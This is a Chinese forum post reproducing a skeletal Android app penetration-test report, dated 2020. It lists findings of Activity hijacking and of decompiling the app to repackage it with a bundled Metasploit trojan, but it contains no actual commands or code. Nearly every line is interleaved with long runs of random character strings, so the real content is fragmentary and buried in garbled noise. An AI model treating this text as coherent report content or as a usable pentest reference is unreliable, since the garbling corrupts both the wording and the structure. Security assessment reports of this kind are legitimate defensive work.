找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4600|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
0 V# p, v. X; D3 H! @ ! g5 Z. F8 |0 T% J

/ I7 j1 z7 w7 } . v# T+ E# y+ {5 k: t$ J
3 {3 Q4 [$ T0 W% Z( P, z0 G , M' b& _8 x- H5 \

& i* f4 Z) k1 x4 |1 Z1 W/ L. C+ c9 x0 w9 j9 k; ^
& G- y4 D. z* d" Z) j i. k" u& m# V: ~; C- U, R1 j; U

0 A4 Q4 s) Z( C6 H( p' S$ w + L2 k" Z$ Q3 v2 K" {3 v 文档编号:                8 ~7 M/ @. f. I; |. B5 a5 h 2 s. e. l" T1 Q5 P7 U

0 Q; A2 p( [. `, _- T$ d 6 i; z) A9 h: q: m4 W

3 O# S# E( C) @' U0 [. j c 1 R7 ?7 k7 B4 d* U( n+ k6 v   : r% l0 R$ l6 {. ?% w : o: P4 i. ]8 ~/ o' S; g `

* Y3 \# n" F/ Q% v1 w$ E 9 s R/ X. g; Y3 o+ O

' v$ ~; C5 S& s/ ]$ O# z $ c! {" u5 l( Z% M( y: } O   7 x# X' @, u: O% ~* \' S 3 P9 f- v( T7 A

; e* ]5 K8 t/ S) _! V ; ~8 N( Y$ a3 K* R7 C

6 f* H9 _- C/ J% R$ b5 u' j3 h6 J9 I$ P% B   & A, |. H0 _* t5 ]! M : ~! S6 |0 L! x( o! G! u, j

" i* G2 |$ T" X) O $ \: q. W7 x& _( ~

. Z& C8 w7 C, K. E6 P1 |, d: I8 Z/ |% N   ( r# o* b! B* ]; s1 m* c7 H) v+ d# b9 G/ Y* v& J# n$ ^/ l

2 x, K2 k" u( ?5 e 7 h; [6 E' g# l" ?" b

1 N) q6 M3 ^& e7 q ' c. @2 z3 O/ ]( x8 j0 j! P; t   4 @6 w" k( U4 {3 ? ! R" r3 u6 U1 Y% Q1 v; F

/ y/ t3 m2 s( O. _0 B 8 Z: Z1 d5 x$ n" e6 h

0 x- q$ P F' o6 W! n( i8 |- s ( Z& b/ c5 F G! e 某某某APP渗透测试 5 ~* Q( o! J% ^% ] $ `5 U! J: P6 t* x

6 C* h; s) g7 ]$ \! s4 { k h% N # Y6 x1 Y- u0 S @& J7 B" c" g

: h ?& k. V9 g M1 a) s 2 `+ t9 ]' n/ S h+ f   7 {% [+ b, M7 h5 t! R4 S ) J& t0 B0 H+ Q$ B

3 i, {- r6 e, } g" \ 4 B: b& x9 S* }$ P; t$ y

3 T5 G$ o- Z$ { / `7 l+ q$ \( }8 p   " S4 { V2 C l3 { $ i& W. R5 l( u' W+ R1 Z- G4 l4 }

$ A4 k5 t, V& I3 {% `. N' A: N# A

3 E) n( J3 q1 t) l# _% k7 q$ I5 t3 b; X1 v4 }4 i b   # H0 j( G8 X0 k. A8 i, | ; `: c. C1 J0 q# Q( _

( b0 f0 _- l+ I" q 0 W' A5 E- Z! p+ W5 r

; W# U6 [7 ]. Z2 O 0 i% `3 D( L7 L9 T) f8 G+ E   : \/ B& k9 S+ ` 1 i) P$ s6 K ~' |, f# S

1 Y6 b) C; `. }; H. y2 c7 N4 q( U9 ]/ u; V" E; S# q' d7 b/ u( g

6 ~/ q; i0 K& A. `. h: e7 g! ` % G) \0 g1 z# u5 }# s7 r9 T 技 术 报 告 % I- h! b9 D$ q( O 8 G+ {3 t% m% S* ]7 X

* J, Z* I: w5 h5 d! o / |$ b5 E' g6 _5 J2 H. t# }( s

& \; I' t5 R* T+ n. v % z _+ Y, e6 L# V$ ]+ a   ) C: T; A3 w1 o* Q% a - b8 H7 F! f4 s S* v

0 i( ] G5 ]: p4 B& n/ |1 m% z x6 p2 L7 k7 N. Q- G

3 Y: G7 }3 E6 x4 D. x& P4 R: p4 F8 j3 S1 U( n$ F3 Q   - N- d& w4 y, r; ~8 y* I+ e ( b, g: M% X$ {6 c7 @' C) G

- }6 g) [( c! s/ G+ M. E6 | [$ x" s, R4 v8 n

8 E R* P% c7 w5 f 9 d2 F5 ?9 r. n   ' p! t$ ^! a: q% f5 F # O0 ^( K2 N. p: L0 T

& e! I& P. Q/ K/ w& ?! S 2 N5 `/ s! }5 H3 g" i8 _

?; N" m: r1 o' n' T* Z2 h$ x, G4 \1 W- R   ( u7 r7 W% l2 }. y; C 0 x( p8 e' H- @9 ^

/ ^0 ?3 l8 r/ n1 I; D 4 w3 m) y5 Q: m! _2 z9 F

& N. X4 T( ` d# ~' O% r1 S; D! |2 |/ Y/ d& \1 {   ) d8 C- L: Z2 }; H3 L " j2 _0 V$ m" p; G

. a7 g3 A8 Y8 V. ^# O $ h) f6 `% `# J2 a" u# V

D5 [2 {6 I5 T; _' V3 j/ N 5 ]9 z8 @- ?" y   ; n3 }7 q' \. M$ ~& U; t5 r4 T & h; u# N3 T! U( G- F; D$ u

3 M7 W& B" c* t9 t3 \6 ^: ~& g8 @. ?# o, Z

8 F+ N& i2 E! x+ [2 l) f; r$ H- p9 [4 s2 j   # V3 _) g! I; Q0 N$ a K5 A! o/ }$ w 2 K# b( I6 l( R4 Q

4 J: y" {2 u; f2 V. [$ ]% h / n2 f# h# \) m4 ^0 X. \1 m

: Y2 }2 G* {9 W x; u/ W% G2 A3 v) g$ N   1 a/ y2 t# p$ X- q : o9 b t/ ^0 q4 q$ k% L; b

! b3 M4 H6 N( Q' J$ t q4 J, N: h" N/ w5 {

- O' L/ g0 [5 S! O5 i Z2 `8 ?) H1 V1 M- i1 k8 w2 O- R   5 y( J1 \! N# j- X" g' t# N ; H+ f& h' E# K: H. [

& S! i5 c1 |1 z2 H: E8 Y ! O" L3 g9 F. i) G w# c

3 z g& m) k, K3 r+ J- g7 c 0 l: c+ t- I: N9 i6 B1 Y   7 j) F" e' ^1 n, t$ S- H ) f- E7 |! n2 y! l. D/ v: |4 V

" i( S0 {! D A, O% B) G' R- V* e 6 h" s, G: r% P& t/ @9 I% M

1 k$ A9 {& @2 i4 f# ~ ( X) P9 Y K S* A, W- {* Q   / `8 z# D/ c0 t + v& i0 N0 e* y7 K* V l' f

1 Z3 p; S# f: p4 `, |( g: L, G n1 t- D) U" |' g0 u9 X: h8 k

# v/ K7 x! y( E8 Y! {' C( {8 e n g 1 C) t8 i. L" V, ?6 n8 R- _2 _   : N+ ^0 H% M. D ~' K' m: ~$ X3 e9 Y, r . f: @4 a4 D+ D8 x2 V8 x

4 g" v0 n( W$ \) P; m. [" o7 V3 A# [/ S. S0 Z0 _# ]0 u6 \2 ~

/ X1 }5 n5 }: s# N( [% J1 x # _: X0 S0 T4 B" P1 w- v5 h( j   / C- q. E2 `7 @0 N S/ M& v5 j/ w/ J5 q: |# j9 y

( L5 J, u9 r! v* E1 g4 l4 j ) G+ {& z8 S$ G. @% i' B8 R% k, x2 [

. H1 K# P8 a, j' W2 u* E * L: P- I" z4 e% ]   - A& G; J! c/ E, m: G" I # S* u% t' N2 f% a6 t& [

: D! F# L" ?- s# r* j! g ' ~2 W* |; E* c% c' ?

- y8 ]( @ X" V$ N Q ! W/ @& B* _) [3 \2 W m1 J   , n. |, o" q3 E& l, |9 \ 2 E2 j& _) { C4 _% z9 \% O/ c; U

: ~$ ^- m$ n# F* G1 N5 [ 3 n1 H3 p2 V5 ~9 o# r, [

# H' I- e7 }- R! R # x# p9 @. X- O: {& ~: Z4 }' B   2 A5 O& |/ v" r1 p+ S ! ?9 w4 z% Q- B4 ~0 f7 ^7 d( f

1 Q4 Z( U) M# t/ F, [0 e6 Z9 Y1 | % i6 g* T5 c6 \9 m& X4 c8 @

$ o( b; x% K; T, E2 t) Q9 L S+ S# J+ d4 l" {% O O   % Y7 V5 C' v' t4 H9 S; t- t% J! K) N1 c; Y9 R( ]+ c% E C" H. W

$ H. A6 h7 y4 _4 q3 j7 R! P 0 j6 A+ K. [( g; [) z0 W

. Q, Q5 b: a2 M: D: Z( J 4 U& L- u3 C* C1 ^5 z3 y6 o/ x) s   + u9 e' H) |4 U5 ], _ $ N) f" o% \( o# m% N

" y; [- n3 g2 Z5 _. Q: k. K+ w) k# R _5 ]2 o z. Y$ l e4 ~

' s: F) J: I1 A X& W/ d$ W # \0 x: o0 ?8 M/ ]6 T 二〇二〇年 9 p# S& a# u0 F& D" r 6 T3 Z# T7 e) X# T1 ?

3 f2 R+ D! z; K. |$ r2 I9 R0 A% Q9 a7 V. c5 ?! ]& k
5 W4 L7 S* \. d# N+ n: u 0 |4 H5 g4 ?$ B: x3 x6 c' H
$ i) f/ ]1 u" R8 P z! l 0 L$ A% H& M5 i) H
5 H$ n! h) n+ s: O+ v4 ^9 I: ^ H( `2 B" D' n3 G
5 W5 I8 l' j; E5 c9 _8 r* |, m0 Z 6 Z, f+ [" H9 V9 k) V. E
3 l7 L& n. @3 A , q! }) V# c5 g
* A# N8 o3 t5 r8 n 3 D) [0 [5 W3 F: t3 |) g! ?
1 S1 k! X% w) W8 k( \ k& i c' I( c8 t C% }9 x
) T1 I$ h: I: O6 s4 W$ w, X 5 ]9 z, M8 G- t+ N- s2 ?& _

{* L- r' }. \, h' g9 L _$ { ' u: S7 |9 S8 H8 @ 目 录 " n- l6 b# T) r- ^" W 1 p7 _# v* b( m6 p

4 r/ G9 E6 V* b9 q. @* Y" U 1 t( x6 f9 t0 A8 S 4 l! N% \6 A9 K/ d! f; ~3 g6 D ( a1 g; S( F7 d- x# r4 W

3 c8 s8 \' y8 f/ C0 X6 v, s8 l ' w) V9 m, s: G+ D   9 U$ \4 |: u1 P0 i" O |; Y 1 |- w8 _1 j9 `

8 V8 I% G/ k# N: F3 {1 n! q3 i e 5 C% @; h3 ^0 N, g+ m- V

9 p Q: i1 t* g" i _8 [: [ ' d2 m6 Q( x9 k- u* Y s 1 概述... 3 8 f/ p$ a$ f( r 2 X0 @/ m- c" S

7 \! P% }* X. n. n0 `* l0 G : w* k9 p- f9 ~( B- g8 y

1 Y* C3 E0 s; {5 N1 d: \# A % F Q8 Z7 y, F6 m! _; C 1.2测试时间... 3 , s. J: l4 W1 d8 ~ 8 m4 f- e; V6 u# w7 Z2 E. U

. J' E& w) f5 r* b 9 Y* l/ `$ v8 i/ r% B5 C

" N- [& C0 g# |; n% H 1 b; M" e; r5 ~. J 1.3测试对象... 3 % h, I, R% |% D- D* ]! ^ ( T# H3 O% M8 C( }. R

7 O' @7 C/ V" o' A) T- t7 n# T 3 Y5 G4 V) B6 z0 C3 Z. ~% p/ R

# I/ U' p ?1 C 8 a' m, c2 l* P7 i2 x 1.4测试结果... 3 5 n7 l$ f9 |- d6 d( q* L. B/ u; H2 R: b7 _. |

% k8 i2 g: x1 i2 E; b3 q: d( _ 5 m- ~; e5 b0 z& I

2 J" ]4 r' \. ], [3 F; D7 B E1 ~ 2 检测结果... 4 + d' `) }. ], l& d7 t5 B6 ]' O$ H2 d! p% g2 d+ B$ {

. d4 `, p, r) q* k$ Q* N* R8 U ) Y% d+ ]- C8 P" J4 S+ T

: m0 E: _' |6 M" h2 f, Q6 a7 v7 H4 \ & p a" f1 u- A( y( } 2.1 某某某... 4 ) H* k* Z% B$ f 8 q; H& c) b( c5 @: a* B

. n* S/ e4 h; F* S, t 1 n4 j; s& T6 K6 Y

( K6 v7 m1 w( _8 f ( b5 \) o. m: u7 f 2.1.1检测目标... 4 ; @5 z* J6 D: O+ T) S5 T + [+ k! g+ l, b& a6 N- e( i

. O$ ], f: l3 q# @$ @ & d+ L. e8 ^& X- O3 s* Y' f

) c" ^$ q6 {* i, a" Y$ n 8 j5 ~: C* T; z [! ?$ A 2.1.2检测结果... 4 ' A: v$ F9 f h. ?, H: R1 F* M+ @+ r! t( ], H

4 N& j- ?9 c4 i0 b& Q" N5 o9 t, t" n, ^. D

6 h! [* _% ?; U9 @# Q+ D- s3 u1 j) S1 w, X* n7 T) t0 C 2.1.2.1. 4 $ H3 R" C% I! \% D9 L+ F! r) J

0 W+ ^: @1 m* |1 q7 ]4 C" j/ B ( ~+ I y2 g, \( ~( z

) p; x% I9 H! I& G2 w . r c+ O. [7 K# O% G% \ 2.1.2.2. 6 / ^3 N0 a+ G8 V4 c# T% e2 k , S0 N7 U. }$ A( O' V9 |" U: g3 Y

* g, N$ v, w7 c6 M5 N 6 ?# K$ O- I' k2 w

. z9 J# Y8 O8 h; L& U/ h 1 ^2 b& j' m, F0 w0 b- |; G8 C j0 M _2 p' v. x* |$ N. K6 g @. |; P; U7 ^# T

9 q; _9 [% R' o $ X- n3 T/ \8 g- | z2 w$ K
7 _' H# ?7 n' Y& H" I8 q $ B: b" b/ d$ H: m1 Q& p. _ Z# w
4 x( T5 X! u: R6 ] b! l 5 I( E# ?" A, f
# U3 ~7 Z& t& R1 ?$ D( f( e% L $ E$ f% P; g5 V' P; n* |
: n6 s) y& d9 U7 h1 Y q ! C0 L% V1 X3 N% y2 E

! u: [# \* C5 U/ p! L 3 |5 v( [( s( F1 o 1 概述 " k4 Q) R& }4 m2 j! d 1 T% b$ N3 }. j5 @

; Z) g+ _# D ` 7 a9 N- H9 C U6 Z$ y7 u2 {8 O, H

) ~8 J+ w/ k1 B& K) [( |# ?& p4 k' j" T# g0 r9 ?: Z& @ 1.2测试时间 - @7 c4 W9 W8 E : W1 f! F$ F7 V

7 L+ ?+ h' a2 h0 R6 y5 B ! e0 d# m( a- |) _9 I5 e8 z; }7 Y0 d 0 A3 L+ X8 g) }' Q e& V! ~( `9 I* ^' g2 {: o# D6 r0 n+ V& V0 b/ k- T) }( y/ ?- ~% M2 e4 u1 e4 E0 c/ m8 _- M9 `' s7 U5 S: r5 ~0 S. E5 H1 d3 H; H. p' t! [' l7 l1 u1 F# _ M1 P- [. @5 l8 B2 s9 x) a9 u7 W! L7 h, d* u! w2 J; \/ h2 k k7 i1 }9 _: D) F( W5 U& T( q) ~4 H* U; x2 {, C- L' n! Z# z- d7 c4 H2 _- y$ } h f; z: w; e; ]$ G7 ~2 h( u! P0 d! n B9 }8 B4 w1 W' k7 V2 N0 U$ ?$ O: N, l& L5 p9 p5 W! ^$ w3 Z# B% P' i7 i: r- ~" G* w; K: Z* @! W4 L, T% b& k e2 V' ~# k4 s7 G1 T1 d: w [. F; h+ M# ~% ?" i1 G4 [* L$ e, d7 Q) ~; H' }9 r# \4 e2 ~. e D: N& p/ {* _0 j1 Z1 a3 Q ~- T6 z8 w( _4 g. j5 A: f& w# e P; S) I) I( a) r" j0 s/ c: r" i! \" e! P. [7 r) j* W, B+ q9 t b, Q
7 a5 C" b, \0 a% [0 ]+ a7 [6 J0 K0 X1 _7 T0 u/ x* H

" F6 \ F" | `% R # X$ Y7 A3 _) d) T4 @+ ] T% Q 渗透测试时间 % ~9 d, B! ]6 S9 b; z ) v' q' s! Y( u/ x }

6 [2 C) C/ w0 ` U % H4 }9 P. H! o1 ?
. R* R3 ]- @" ], i! A6 C; K+ F 5 v# p) q" C4 N0 `5 ^0 ^$ w$ I4 |

2 S* \: l8 g# D2 w8 Q7 e 2 S1 K- z2 c; \5 t: I$ `& J 起始时间 & J- y g6 K- B' k/ s8 g: w 8 f: ~( H+ u* K" w; n

7 C5 k& x" l8 j8 Z( v/ R1 V& r/ i% l9 l9 ^& O: {$ @3 k/ d# D
0 b) f& Z {9 P. E1 S8 o7 u 3 e5 J; U9 s8 d6 y1 D/ r1 {; N6 B! f

9 N) B( h" S1 v' X. A. h # o/ O C3 ?; @+ N 202046 5 X& k( I6 t8 ~ " Z x- a, Z( {) v

- M* \' }, P0 ~3 c z6 W# Q$ w8 D/ G
/ k5 N; `6 O+ O# {3 K ( J* h* u$ h' L7 G. U( ^' y

# u: _4 r2 ]; [9 d# i7 ~" @ , X) P, j+ o9 q6 B2 g 结束时间 4 m' s7 T' Y1 v( s) \5 d" ^% n5 W: |6 r8 ]

8 R& o: X- Z7 t1 |, c% d' v& P2 m/ T. v: D. |2 V2 g
+ k, b& d7 ]) x( a 5 y, }8 i" u0 Z2 b0 h! ?. Q

7 n7 m1 F4 v5 i. i2 [; D 9 ]6 R. f: ?+ e" w 202049 1 G: l; O# i7 N7 P& f6 E0 n& w # n; ]: O' E: {9 H( m3 e5 l

& D/ C" i: Z# @- j6 l5 q" C/ w. [0 E5 I0 Q" }( b4 ]: c8 E
" ]2 B/ L0 l2 {. }9 p( | U8 \ {' [! O4 F

$ W7 E! \) ~4 F' @ ? . d0 J. r' M' R* J( k. A 1.3测试对象 ) \. j3 V8 X( A; A# a; n! p( }5 G; y

- R$ z' p& k+ F/ I # G V) G @! c/ ]- X+ |

[% ?* s0 K: O- a# r ; t* N7 A$ B; P8 t, U. f 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: & r4 s; ?) \: a/ N . f+ x9 d- k0 S0 w

/ R1 J' M6 W7 Y+ q : L0 k$ |. K# A( X4 { K8 J6 o

, ]$ U" L7 c+ r6 g; A / }7 {& c: V4 ~$ e, H: `* [! Z, G 1-1 检测对象 $ ^+ g7 B3 D" k8 F% l2 p: @) W! M6 z3 i" K2 N

" r% T0 F7 s- z 9 w: _% K) G8 \! @2 b. p3 W5 M Y! i: S* f. |0 ?0 U3 @0 G1 j8 l- \9 ? z( L) j9 n% t# ] M' A9 U1 h! H" K% @! N7 s6 \# O5 I K( _8 s+ f& f; m; u, B z: }2 Y; A! L# h& d; y7 F) a' _! v7 A6 C+ t# g7 |* V4 _7 |6 k# S5 I0 a2 Y# A: G2 c' G6 e" H8 l/ ~4 [3 G. j3 N7 h+ }/ `: e$ \ l u' w L6 ~' k/ g' Z/ _( ?" R. S- J8 t, N2 E' x9 \9 l. V( x( z. ]1 S: s- I6 Q. l- I% D1 P; F9 d: u* x O: t4 O$ C( w. p2 v+ x6 Y: d! M, |' m! T7 H4 p* f% U/ _! A: _2 L- H1 z' O, }9 v0 i5 N0 @% X2 B" E( g2 [7 C' z- g6 v% a4 s- u, d7 s$ G: g( y/ c. R/ G1 N. z, U. R [! {5 N+ k1 L j5 c, M4 r4 Z8 |! d3 f; K# { ^ L' m4 X8 K6 G! H( k1 w- [$ \/ y, t0 ?( I. ^$ M8 X0 Z8 m7 U8 r2 t; x% A) E2 m% k2 l7 y4 F1 e1 J. D" G' l) w+ Q, e3 ]) B) s+ Z: R {& I" Q F' j4 {
" x! S5 ^, k% q( O ; ]# }: E7 E$ `3 ~. J

+ \- Y" ^, ]- b# R' _ W& m # l7 x* Y. W! S. R7 t 序号 : M, x8 H( F+ i" n" m% A $ `4 H+ E `+ X+ w, H

/ _9 X. P/ i" w( J0 |1 Y u+ F1 M, ^: V- O$ D
# p$ v4 g+ O K4 \. @- H ; B# b' U6 j0 \, A

+ U) E& |, g# p T4 I+ K/ s1 ]( v3 ]; n. u, ~ 测试对象 # K# T! E9 d) Y9 E 3 `1 G3 p! }; l. Z3 ?0 s1 W

: F8 _7 d7 T% d( F " o0 V9 {9 |7 ]' g- x
; W+ _- [3 ], |7 f( u - z9 q% Z" N! D) Y+ B1 L

- Q3 i5 I' L% l1 N 3 ]5 F# ~! n. m7 f j 测试地址 2 U& V) E9 P4 H3 f# ]# z8 P4 P; C+ w: y& L, V! @; l4 r2 ?' ]9 T& f

0 n& ?, X* F! z) ], T3 C " a" {' M. p' d! c/ E; p) \
) l3 ~: g( u! ^* a3 ?5 z- q2 x1 F ]6 j

; r8 ] x- ~, Y8 f# `2 k3 k& n9 d7 ? d v6 q9 J 安全漏洞 6 K5 Z5 J! y. ?0 K) C5 V5 m6 S5 ?0 e8 W* m8 _% f

" S& g# S/ j9 `) i1 H7 [6 P" U: l& Z
) L8 n5 k" L2 { K8 ]" ^; P % P5 B2 N1 q- S, w

0 r+ P% A' K* s 0 e4 ~% o2 }3 Z- S 1 - T" l# X# W" h3 K x4 W7 m4 R% ?" [" K

: Q% d" p8 g, M5 D9 h2 N) I, e 6 ~! g4 \/ B0 w! M. p* @
% B7 u- N& Y: ~ ) s& f) c o7 D4 y0 A

8 r, ^( B3 ]& g6 h& a) |. s' ~) V% }/ O* D: Q 某某某安卓APP * C' i, ~; P4 W- }4 R) E8 D. @ ! r8 }. i W7 r: g( q& @

" @9 H4 P h7 G% `' P/ o( k & ?, t# w+ {' J0 n
' Y/ t$ o3 P2 C7 o/ p * I) N9 m( q* R9 i R8 S- _

8 g# A# f, \4 T( B+ O5 u) f& v4 p* R1 P/ M   1 _! f! |+ } j; R3 z: {" z% `2 U: F# E

5 J7 t' Z+ z3 C4 r1 l' ]8 r7 `6 ] " k/ d/ l- n$ \. P" X X
S+ H* u1 w, w: [7 V5 z8 v7 o# d

# S4 e7 k; F& D# E3 v - I6 B2 O+ @% S$ ]7 X+ G: V' x 2 , F2 x: G. w2 P; @; U! ` ( G8 b9 D$ s* ~8 K0 i& I

2 Q# \& {9 D9 j% e% S, _ ( L1 H# o" ]- ~; X7 b# ^7 M
; R/ p- E- M8 x2 q ^+ M : c) u1 r( Q( I3 ~- n0 A" ?$ t, V

/ L5 o7 j4 N. F- Z) a ; K9 a6 P' x: ?2 S) a6 k; G& U7 H 1.4测试结果 . h7 l; ^. j& Y8 v0 N% o 0 |2 r5 A: f, {# g

2 y$ t+ E. a+ h) w! x, a8 q$ q- h2 q2 ` v, E: w

6 Q) S# r: [. T9 E: [$ P" k U # I' T& P* O4 } 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: # ~+ e t f5 E- _; v8 I ( W4 c: a; ~9 u+ _0 C/ _" ]: f

/ H" P$ t4 B" u# P# e ) p- o" V) k* z4 e3 n0 k

) u) [: m' \* d$ w 0 s7 U4 G) N9 P4 P- A3 D   ! Y& A/ L6 J. r# Q ) N- o' g. h; v! U( G5 f

. D; B: f. X( x0 O 3 T) v' M8 j& \5 R! Y- a& Q0 }
1 d# W) K* \( b" h( S8 S( L 7 m6 a: X5 q& s6 x \- d6 A/ G" P/ a- \' B' j2 ?& I* I3 p: q- K; u6 j. j6 c3 T" d: [' u& n6 M& R0 d8 T* m1 n( F" P) D8 [5 m0 Q4 r' N& ]4 [) L& U! A( ~2 Y9 J. s( ^" O* G& Z) Q4 L' v3 I0 b% I5 Z8 ~2 X0 I: A2 W' O! O6 G1 C. ^) G3 Q+ A, ]1 [% T" T6 ?* [. O$ }+ Y B& X6 ^, C: H( V$ p( m" |. L& t& {, ^6 |' q$ o+ V' v9 c4 W B, k. ^9 [" y* R# Y# M) p I& Y, v7 c) v. \0 a% F2 ^6 |) k$ f3 }6 M: i% r0 N) z2 b1 c; C, h, Y" \# a4 W5 s: f7 Y3 [' {" E7 T$ M& k) m E# s# [. d) ?5 k/ q6 T- Z0 M" }) v G/ S$ J i" z3 u3 j6 c: g; R; a. a" A( i3 Y' ?; f# Z/ D- n8 p3 B( k9 e& y6 g/ `: D9 h7 v) E, X: Y( K+ L: N2 _ `" ?* y" v% y) ^! K2 ~( R* f/ o9 B! ?' |6 l7 \0 t3 f" h0 E2 `! f& j% E ]8 h) L. y& _9 \' Z; m1 q( j Q8 C% z& c9 Z; h5 P4 S( K" e+ Z7 l2 L4 a6 p0 b, L `- J, _5 n, j+ M9 E- {- P5 q2 r! U z+ p5 u/ E1 A" i" _% ~4 s! r7 i2 W- Q3 K5 G6 [/ M- m7 d' t" k0 c; g# F, B" b5 k% v. J, Z! t6 z7 {+ M- i _( O% s$ z! m0 q7 w. j. U% d* V5 ]4 `3 u; e# l) b, e& h2 i2 a7 T. B7 _6 t9 l' s4 l8 ^2 [- r6 k& ?, h9 c r2 g" S8 \4 l T, m4 i- K" y( `$ s" u4 \; `8 m: G) B' n1 E5 M0 e! D7 E" H$ e9 J4 V1 g8 B% p$ j* g2 q. u) p6 l7 t8 x. w, N) Q2 F X' p7 m! U6 A2 a5 ?
8 d6 k$ i/ S# q' n/ F2 ^, s 0 ?9 r6 v/ d; r( i6 x( E7 m! {

! ]; O# t% S0 X( ^- [" w- @1 E; G- e* H* g. v. I0 Q 序号 7 ]6 |% {$ u; t 5 [8 ~* E X* W% x" G' N* [+ z

' R% C9 D: T' ~* A E* v5 |* e! V9 c$ Z
: Z3 | C7 h( w ) ?8 V& I8 {$ B3 D

7 Y: v# i: ?3 m7 d) D: d. I- M) j8 {. A. G$ y 系统名称 6 u8 ~0 [6 D" e2 M) \" ] ; V6 h. F) ^9 N

8 V% X' U5 K' z' _, X. } ! }5 X) x0 H3 i" U( o! ]! N
& U" O7 Y* m) I5 q3 V6 p 4 J1 S: h$ r: z l2 z. @7 h4 l

% S! k1 G* L0 @6 @4 @ , d% t! e2 r* H: ^- j ^4 T- h$ Q 漏洞名称 / [' L+ d" x9 n6 s5 d. ~) c* C& N) @1 W 9 p3 E3 \- W, l& w$ _3 B; a

! g8 N. a' r6 w 5 T) n; Q: s9 w# J7 d
3 e( b* `' f( ^4 L }( k0 c/ F1 _5 j0 n4 f7 s

, w$ D( D3 L# p) R. u( t5 O+ t 4 Q% X) R. Y5 b! K; q. z# U+ Z2 |# R 漏洞危害 ( ^# _. I6 X L; p; `2 F % [# N- i N- D. Z: G" j+ \+ Z' v

) w$ u) ^5 I5 `3 s' h$ W / X+ O! B: t9 q7 M6 e1 `
& q' o& \: i5 J" B; y) v ; {( x: Y- M# q+ M2 X3 T% D! v

) T- o/ d/ [2 `0 h- G R 9 _ L8 z6 E* Z- v2 D1 |, j 修复结果 $ V6 z; ~, l9 q7 C6 P1 J; m2 s; K/ A- B+ c) \! {, f2 t

1 `/ Y3 ]8 \* `+ L G7 C : p! G7 c3 n8 k* P: W
q4 f- ], [ |8 a" G2 p! I* a0 b% q& M1 K1 h8 R

. U; m) W6 V( L- r! \6 t2 u . T1 E5 A" d7 I& g; \* a: M7 _ 1 ; Q. ^$ f0 d5 }: G' u7 V 6 i, f5 G# G' z0 J% j) O- Y; s

; m5 T' s; S9 R 4 i% h8 W4 Z5 V) i, g( ^
1 Y* F) c v) O0 J& b; I" {% W+ P, ?; b+ r4 ^

: p0 N, o9 ?: t8 P! e! M1 ^# K0 o; r# |& D, o 某某某某某某APP & z& y; @) u+ f+ u: n7 s! e% X7 p : r9 a' E5 a" g3 O

- y. f- y; k5 s: E' `6 M5 ?2 w- Z8 ?5 C0 x
1 L% V; w A1 L( ~: b8 u! ~( I& r; G& u' D5 v K

4 p/ @- m, p+ r* \, @ 2 R+ R' ^3 l! O; W; F( O) s Activity 劫持 7 x' v& Q3 W# s& q9 S& n2 R7 Z! t/ o _( j- W3 M

, @3 k: Y) R% @) x % \, |4 A) x Z1 x$ m

8 }/ | m+ S" Y$ p) C1 C P* e$ c2 v0 @+ K3 ~; k   8 Q- o j7 X' L* q& q, J: X( d0 f$ x , h; ^7 W/ M0 }) S

) e& S# U2 m" c, p! Y+ Q ! d/ ?; }1 g% A! S
7 X; U. E) A/ X5 l' M. Q6 r* c0 `2 Z1 Q; B' g

9 C t" l! j) l( z- f- Z; d, o. { % a4 D% r6 K6 }- N$ _1 Q c 1 t7 {4 [$ I( D. `0 Y

8 d5 A/ y& \7 c/ ?* O5 i+ @ 7 m7 Y5 Q1 N0 B e) h
, R, P7 c8 r9 m z ( `, @8 O1 b/ x& g

1 A& N3 n* I4 H. w9 B+ {9 ^" J6 U+ S' v- _3 a2 C1 B   + ?" R8 F) M3 r0 _% W / `9 x& z) Z' [9 N! W4 U, S

. M! Z" w+ \% t# \, T, A2 ^7 f9 r6 c! N# M3 g, u. X5 y( i
# k" f+ K6 S5 f3 l3 o4 x q& U; h0 a & y8 o+ W0 Y+ K5 X/ W0 ^9 M i

% Q# u. |4 ?% ^) Y' } 7 j0 R6 T, f) T. [. ?4 B* |) M 2 5 B" N( r/ H F* U" U$ I" S8 N. ` }2 W ?' Q

4 f8 s, t- O$ r: [# _ {5 @$ X9 e' s: N- ^3 H- g
' k$ g- ]& O M, Z; b) g$ B0 U 7 O( `# l7 o8 J/ B1 Q }

8 ^4 |2 I% N$ C& i. R9 A1 T. e 9 t( K/ D5 l: J2 P6 p 某某某某某某APP 4 A0 L/ C) q0 X" S + J4 R) \+ z3 U( [4 ?

3 Y% ?% {0 H5 k+ v+ s $ H( }% K$ J! U( d0 q
2 P( P' \! P7 z! l 7 h* J3 k$ r1 j, W0 L

# d- F, z ~) |6 T/ H p2 U ! e5 h/ ]6 e6 m. @" @( e8 L 反编译二次打包捆绑木马、篡改APP代码 7 r0 b, T* P% _" I V ; q0 ?: @) s6 \; p+ X

- F1 K$ {: J2 e* Q+ J + `+ f+ w4 k/ H$ T I/ X
' \( I, n" N) A 1 L0 M: W$ `+ A! }

2 c) M5 E5 n" t" C2 D" }3 `: f: y1 G6 N. u6 _& r5 X : Q! w% S! Q( |- o2 b & O9 ~: }3 S q0 p

. H$ t! V6 G- Q" C g. J4 u* A9 L9 V% b) m
% o( r0 Z! X9 H" Y+ z, Z( r ; r: I7 ~7 {" W! {- d* H& g+ Q

8 f) \/ @9 ?7 z) {3 i: g$ n4 D" S1 q# m# s8 k4 U8 |# b; L# O   ; u" A) d, Q) D( M1 E9 y & s( J- ~* M6 J: P; e. K' `

; v% E. u9 F5 I' Z1 [" Y2 Y . n4 r+ z" P g- \
0 f0 q* O. V" ~3 l0 T2 `' l* f) _- e0 s' `8 _
) O: Z# h+ ~, p1 l. N! }! r p* i, I" Z8 n8 L( {7 N2 f r3 c

* `$ R/ H: W8 L) Y, K% j _7 [ 0 y p9 |) A2 n0 V- J4 n4 C   ! Z; ~& c# z( D" F+ `4 ?- f, q$ |: _4 X3 K0 x

( D! E+ b: @) U7 Z " `/ x5 i& K. h- s2 G* O6 ^

